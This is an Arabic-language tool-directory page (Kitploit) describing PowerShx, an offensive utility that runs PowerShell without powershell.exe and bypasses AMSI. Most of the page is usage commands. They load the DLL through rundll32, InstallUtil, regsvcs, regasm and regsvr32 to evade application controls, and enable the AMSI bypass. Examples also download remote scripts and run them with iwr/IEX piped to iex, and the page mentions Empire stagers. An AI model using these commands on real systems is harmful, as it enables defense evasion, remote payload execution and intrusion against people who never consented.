Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/iomoath/powershx
أدوات دفاعيةتصعيد الامتيازاتتوليد الحمولةالتهرب من IDS/IPSالحركة الجانبيةالبرمجة النصية والأتمتةما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubiomoath/powershx

PowerShx

28146منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تشغيل باورشيل بدون قيود البرامج.

عرض المستودع

SharpShx


تنفيذ باورشيل غير مُدار باستخدام مكتبات DLL أو ملف تنفيذي مستقل.

مقدمة

PowerShx هو إعادة كتابة وتوسعة لمشروع PowerShdll. يوفر PowerShx وظائف لتجاوز AMSI وتشغيل أوامر PS Cmdlets.

الميزات

  • تشغيل باورشيل باستخدام مكتبات DLL عبر rundll32.exe، installutil.exe، regsvcs.exe أو regasm.exe، regsvr32.exe.
  • تشغيل باورشيل بدون powershell.exe أو powershell_ise.exe
  • ميزات تجاوز AMSI.
  • تشغيل نصوص باورشيل مباشرة من سطر الأوامر أو ملفات باورشيل
  • استيراد وحدات باورشيل وتنفيذ أوامر باورشيل.

الاستخدام

إصدار .dll

rundll32

root@kitploit:~
rundll32 PowerShx.dll,main -e                           <PS script to run>
rundll32 PowerShx.dll,main -f <path>                    Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet>     Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w                           Start an interactive console in a new window
rundll32 PowerShx.dll,main -i                           Start an interactive console
rundll32 PowerShx.dll,main -s                           Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v                           Print Execution Output to the console

البدائل (فضل لـ SubTee على هذه التقنيات):

root@kitploit:~
1. 
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
3. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
4. 
    regsvr32 /s  /u PowerShx.dll -->Calls DllUnregisterServer
    regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

إصدار .exe

root@kitploit:~
PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e                          <PS script to run>
PowerShx.exe -f <path>                   Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet>    Load a script and run a PS cmdlet
PowerShx.exe -s                          Attempt to bypass AMSI.

الحمولات المضمنة

يمكن تضمين الحمولات عن طريق تحديث قاموس البيانات "Common.Payloads.PayloadDict" في مشروع "Common" واستدعائه في الطريقة PsSession.cs -> Handle() . مثال: في طريقة Handle():

root@kitploit:~
private void Handle(Options options)
{
  // Pre-execution before user script
  _ps.Exe(Payloads.PayloadDict["amsi"]);
}

أمثلة

تشغيل نص مشفر بـ base64

root@kitploit:~
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

ملاحظة: يجب فك تشفير stagers الخاصة بـ Empire باستخدام [System.Text.Encoding]::Unicode

تشغيل نص مشفر بـ base64

root@kitploit:~
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

المتطلبات

.NET 4

المشكلات المعروفة

بعض الأخطاء لا تظهر في المخرجات. قد يكون هذا مربكًا حيث أن أوامر مثل Import-Module لا تظهر خطأ عند الفشل. تأكد من كتابة الأوامر بشكل صحيح.

في وضع dll، يعتمد الوضع التفاعلي ومخرجات الأوامر على اختطاف وحدة التحكم الخاصة بالعملية الأم. إذا لم يكن للعملية الأم وحدة تحكم، استخدم المفتاح -n لعدم إظهار المخرجات وإلا سيتعطل التطبيق.

نظرًا للطريقة التي يتعامل بها Rundll32 مع الوسائط، فإن استخدام عدة مسافات بين المفاتيح والوسائط قد يسبب مشاكل. المسافات المتعددة داخل النصوص لا بأس بها.

تنزيل الأداة